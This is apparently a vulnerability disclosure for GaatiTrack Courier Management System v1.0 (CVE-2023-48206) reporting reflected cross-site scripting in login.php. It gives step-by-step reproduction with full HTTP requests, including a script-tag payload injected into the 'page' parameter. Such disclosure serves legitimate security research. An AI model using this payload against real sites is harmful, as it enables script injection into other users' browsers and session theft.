Share
## https://sploitus.com/exploit?id=PACKETSTORM:175803
# Exploit Title: GaatiTrack Courier Management System v1.0 - Multiple  
Cross-site scripting  
# Date: 12/112023  
# Exploit Author: BugsBD Security Researcher (Rahad Chowdhury)  
# Vendor Homepage: https://www.mayurik.com/  
# Software Link:  
https://www.mayurik.com/source-code/P0998/best-courier-management-system-project-in-php  
# Version: v1.0  
# Tested on: Windows 10, PHP 8.2.4, Apache 2.4.56  
# CVE: CVE-2023-48206  
  
Description:  
Multiple reflected cross-site scripting (XSS) vulnerability exists in  
login.php, header.php page of GaatiTrack Courier Management System v1.0  
that allows attackers to execute arbitrary web scripts or HTML via a  
crafted payload injected into the Website login page parameter.  
  
Steps to Reproduce:  
1. Go to login and capture request data using burp suite. Your request data  
will be:  
  
GET /gaatitrack/login.php HTTP/1.1  
Host: 192.168.1.74  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)  
Gecko/20100101 Firefox/119.0  
Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
Connection: close  
Cookie: PHPSESSID=abl1dci7hob2f90sf5ag9k00mp  
Upgrade-Insecure-Requests: 1  
  
2. Now use XSS payload in login.php. So your request data will be:  
GET  
/gaatitrack/login.php?page=1</title><script>alert(document.domain)</script>  
HTTP/1.1  
Host: 192.168.1.74  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)  
Gecko/20100101 Firefox/119.0  
Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
Connection: close  
Cookie: PHPSESSID=abl1dci7hob2f90sf5ag9k00mp  
Upgrade-Insecure-Requests: 1  
  
3. Forward You request data and check browser. You will be popup with  
domain.  
  
## Reproduce:  
[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48206)